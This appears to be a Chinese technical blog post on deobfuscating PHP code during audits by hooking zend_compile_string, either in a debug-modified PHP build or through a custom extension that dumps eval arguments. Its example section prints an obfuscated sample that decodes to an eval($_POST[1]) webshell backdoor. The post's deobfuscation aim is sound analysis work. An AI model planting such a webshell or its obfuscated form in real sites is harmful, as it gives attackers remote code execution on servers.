对数字进行 混淆 php,解密混淆的PHP程序

最新推荐文章于 2024-06-17 10:10:39 发布
最新推荐文章于 2024-06-17 10:10:39 发布
阅读量515 收藏 1
点赞数
文章标签: 对数字进行 混淆 php

author: WeaponX

0x01 背景

团队大佬在做PHP代码审计的时候发现PHP代码是被混淆过的。虽然可以通过自己手动解密可以还原原先的PHP代码,但是混淆过程比较复杂且自己写脚本还原非常麻烦。所以,我这边通过PHP底层的操作对混淆后的PHP代码进行还原。

0x02 PHP代码混淆

PHP代码混淆一般来说有两种方法:

需要PHP扩展

无需PHP扩展

本文我们主要讲解无需PHP扩展的代码混淆的解密。大多数的无需扩展的php代码混淆原理上都是使用eval进行代码的执行。如果我们能够得到eval函数的参数,即可获得解密后的代码。

不过,一般来说PHP的混淆都会通过多次eval来还原并执行php代码,所以我们可以通过hook PHP的eval函数来打印其参数来解密代码。

0x03 hook eval

PHP中的eval函数在Zend里需要调用zend_compile_string函数,我们可以通过调试看看zend_compile_string函数。

user@ubuntu ~/php-5.6.35/Zend ~ grep -rn "zend_compile_string" *

zend.c:693:zend_compile_string = compile_string;

复制代码

我们发现zend_compile_string函数其实就是compile_string函数。所以我们可以通过写一个简单的PHP代码,看能否在compile_string中获取到eval参数的值

eval("phpinfo();");

?>

复制代码

首先我们编译一下下载好的PHP。注意,由于我们后面要进行调试,所以要在编译时加上-g参数,加调试符号。

./configure CFLAGS="-g" CXXFLAGS="-g"

make -j16

复制代码

接着我们使用gdb调试php程序。首先设置程序的参数,且在compile_string函数下好断点。

gdb-peda$ set args xxx.php

gdb-peda$ b compile_string

Breakpoint 1 at 0x6b4480: file Zend/zend_language_scanner.l, line 716.

复制代码

然后让php程序跑起来

1ce70aa71482f8471f94384ed615bd6d.png

发现程序断下来后,我们发现compile_string的第一个参数source_string为php代码中eval函数的参数在Zend中的结构——即zval_struct。source_string.value.str.val即为参数的字符串形式。

通过修改compile_string函数来打印eval的参数,代码如下

if (Z_TYPE_P(source_string) == IS_STRING)// 判断是否为string类型

{

len = Z_STRLEN_P(source_string);// 求string的长度

str = estrndup(Z_STRVAL_P(source_string), len);// 拷贝到str中

printf("\n==================DUMP_CODE====================\n");

printf("%s\n", str);//打印

printf("\n==================DUMP_CODE====================\n");

}

复制代码

修改好之后重新编译php,运行被加密的php代码

76d8f21fd1b81dfbc7e7a332a2b95351.png

解密后的PHP代码如下

4a0b83f0ad71aa1b2894517da6d76a85.png

可以看到已经完全还原了被混淆的PHP代码

通过编写php扩展来解密php脚本

编写php扩展的原理就是用我们的函数hook zend_compile_string函数,将函数的参数打印出来后再交还给zend_compile_string函数执行即可。

./ext/ext_skel --extname=decrypt_code

复制代码

首先,我们写一个自己的hook函数。此函数的功能就是判断eval函数的参数是否为字符串,如果不是,则按原路径执行;如果是,则将参数打印出来后按照原路径执行。

static zend_op_array *decrypt_code_compile_string(zval *source_string, char *filename TSRMLS_DC)

{

int len;

char *str;

if (Z_TYPE_P(source_string) != IS_STRING)

{

return orig_zend_compile_string(source_string, filename TSRMLS_CC);

}

len = Z_STRLEN_P(source_string);

str = estrndup(Z_STRVAL_P(source_string), len);

printf("\n==========DUMP===========\n");

printf("%s", str);

printf("\n==========DUMP===========\n");

return orig_zend_compile_string(source_string, filename TSRMLS_CC);

}

复制代码

接着,我们修改PHP扩展加载函数

PHP_MINIT_FUNCTION(decrypt_code)

{

/* If you have INI entries, uncomment these lines

REGISTER_INI_ENTRIES();

*/

orig_compile_string = zend_compile_string;

zend_compile_string = decrypt_code_compile_string;

return SUCCESS;

}

复制代码

此函数的功能就是保存zend_compile_string函数的地址,接着用我们的hook函数替换zend_compile_string的地址。当eval函数调用zend_compile_string时,就调用了我们的hook函数。

最后,我们修改PHP扩展的卸载函数

PHP_MSHUTDOWN_FUNCTION(decrypt_code)

{

/* uncomment this line if you have INI entries

UNREGISTER_INI_ENTRIES();

*/

zend_compile_string = orig_zend_compile_string;

return SUCCESS;

}

复制代码

当这个扩展被卸载的时候将函数的hook解除。

最后,编译我们的扩展

phpize

./configure --with-php-config=/usr/local/php/bin/php-config

make

复制代码

接着,在php.ini中加上我们的扩展。

extension=decrypt_code.so

复制代码

运行此脚本也可得到同样的输出。

0x04 利用其他函数还原的解密

其实,混淆代码的解密就是类似于代码执行。最终还是要执行PHP代码,而执行PHP代码的方法很多,除了eval函数还有assert、call_user_func、call_user_func_array、create_function等。这些函数的底层也是调用了zend_compile_string,所以也可以利用hook eval来还原混淆后的加密代码。

0x05 Example

一段示例代码。

$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();

?>

复制代码

运行一下,得到解密后的结果。

./php 3.php

=====================DUMP_CODE========================

function __lambda_func(){eval($_POST[1]);}

=====================DUMP_CODE========================

复制代码

0x06 Refer

濮泱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php混淆类加密解密工具v1.0免费版.zip
09-07
php混淆类加密解密工具
php number混淆
weixin_33671935的博客
05-17 61
<?php /** * 对整数id进行可逆混淆 */ function encodeId($id) { $sid = ($id & 0xff000000); $sid += ($id & 0x0000ff00) << 8; $sid += ($id & 0x00ff0000) >> 8; $sid += ($id ...
PHP混淆加密以及常用的一些加密工具
最新发布
Admans的专栏
06-17 1316
PHP混淆加密是一种将源代码转换为难以理解和阅读的方式,以保护代码的。版权声明:本文为作者原创文章,转载请附上博文链接!以下是一些常用的收费加密工具,可以用于加密。a 替换为 a替换为。作者:Byte Beat。
php混淆
weixin_45649612的博客
06-06 762
混淆方法: 两个文件采用了4种混淆方法对代码进行混淆 1、局部变量追加乱码 对于局部变量,在经过转为无意义单字符后,在变量名后追加多个’\xEF\xBD\xBD’字符,并在其中混杂一些其他不可见字符(7E以后的),给人以乱码的感觉,单实际上并无影响。局部变量可以任意命名,只要能区分出来就行。 2、利用unicode加转义符显示字符串,采用十进制和十六进制两种方式进行显示,避免直观看到。 php可以使用如"\150\157\155\145\120\141\164\150"(十进制)或"\x73\x79\x73
php 混淆id,一个混淆数字userid的简单方法
weixin_42502896的博客
03-17 330
/*一个混淆数字userid的简单方法效果是 encode: 1234 =>48915174decode :48915174 => 1234*/function encodeNumber( $number, $modulo, $prime ){return ( $number * $prime ) & $modulo; // &操作等价于取模}function de...
php 代码混淆
qiuziqiqi的博客
06-10 5546
最近被要求把产品代码加密,找了下现有的混淆方式 参考如下 # 方案 类型 是否免费 优劣势分析 1 Zend Guard 基于加解密客户端 收费 PHP官方出品,是目前成熟的加密方案,不支持PHP7。Zend Guard用于加密(安装在开发或打包环境),Zend Guard Loader用于解密(安装在线上环境)软件下载 市面上仅流传出...
php混淆解密软件
01-12
另一方面,PHP解密则是对混淆或加密的PHP代码进行逆向工程,使其恢复到可读的状态。这通常在以下情况下变得必要:例如,购买了加密的商业插件,需要对其进行自定义修改;或者分析开源项目,但源码被混淆了。PHP解密...
goto解密程序php源码,直接上传即可解密goto加密的代码
12-31
php goto解密源码,无需数据库,直接上传即可使用。亲测可解php的goto加密方式
PHP程序开发在线解密工具源码v1.2 增加代码美化/混淆修复功能
02-16
1.增加代码美化,混淆修复功能 2.增加“已知 BUG”列表 3.支持解密魔方二代 V1.1 1.增加解密数据统计 2.可以解密简单的 eval 多层加密 (网站整改,可能会导致服务异常) 3.修复部分 Xend 误判为 eval 4.支持识别 ...
php版js混淆加密插件
01-03
这个插件允许开发者对JavaScript代码进行混淆和加密,使其难以被逆向工程破解。 首先,我们来看一下`combined.js`,这通常是一个合并后的JavaScript文件,将多个单独的JS文件整合到一起,以减少HTTP请求,提高页面...
php 混淆
06-28 1797
http://cn.textrush.com/formatting-php.htm 
PHP代码混淆类(带实例)
02-21
PHP代码混淆类,用非加密方式保护PHP程序不被篡改。 主要对PHP代码中的变量、函数和类进行混淆,达到通过人工手段几乎不可能进行修改的效果。 支持自定义混淆变量名、函数名和类名。 支持忽略对某些文件的混淆
php源码混淆加密代码
09-11
修改过的php源码加密代码,支持多文件批量加密,加密文件保持原文件名生成于code的目录下
PHP文件代码混淆举例
12-24
看代码内容就能理解了, 直接将php的代码进行混淆,阅读难度极高,但依然可以直接执行
PHP实现的ID混淆算法类与用法示例
10-18
主要介绍了PHP实现的ID混淆算法类与用法,结合实例形式分析了php针对数字基于位运算、位移等操作的加密解密相关实现技巧,需要的朋友可以参考下
php-obfuscate:PHP代码混淆示例
05-20
PHP混淆 安装 php composer.phar install 用法 cd php-obfuscate 把你PHP代码到input.php php index.php 混淆的代码放在output.php
php混淆解密,php混淆加密解密实战
weixin_42118056的博客
03-10 3058
在查看别人的php源码的时候,我们经常会看到加密后的php代码.那么php加密原理是什么呢?怎么解密呢?混淆加密加密代码:
PHP 代码混淆处理思路
码农UP2U
07-12 1550
昨天在一个 PHP 的群里看到一个图片,图片如下: 看到这个图片,我觉得这应该是某个收费项目的源码,收费的项目为什么还要提供源码,这就是 PHP 的问题之一吧。 很多人也许想要修改这样的源码,但是无奈源码又是这样的让人看不懂。拿到这样的源码,我估计很多想要修改源码的一部分人就被卡住了。在这种情况下,我想说的是,作者既然这么做了,就是不希望被别人修改。如果真的觉得项目好的话,其实可以去付费的,毕竟软件是每个软件工程师的汗水。 ...
数据混淆度的计算方式
jiede1的博客
03-20 3512
面对机器学习的分类问题时,研究数据混淆度所使用的方法主要有两类:1.基于几何统计的角度。2.基于信息论的角度。几何统计的角度1. 适用于连续数据集下的数据混淆度指标的算法 (1)最大Fisher判别率F1 F1是待分类的训练数据集当中各个属性的Fisher判别率最大的那个值。 f=(u1−u2)2(α1)2+(α2)2f=\frac{(u_1-u_2)^2}{(α_1)^2+(α_2)^
Menc-JIAMI: PHP代码混淆加密系统源码
- **低性能损耗**:尽管进行了加密,但代码执行效率仍然保持在较高水平,不会因加密而显著影响程序性能。 - **高度混淆**:采用先进的混淆算法,使得代码难以理解和逆向工程,有效保护源代码的安全。 - **自定义...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值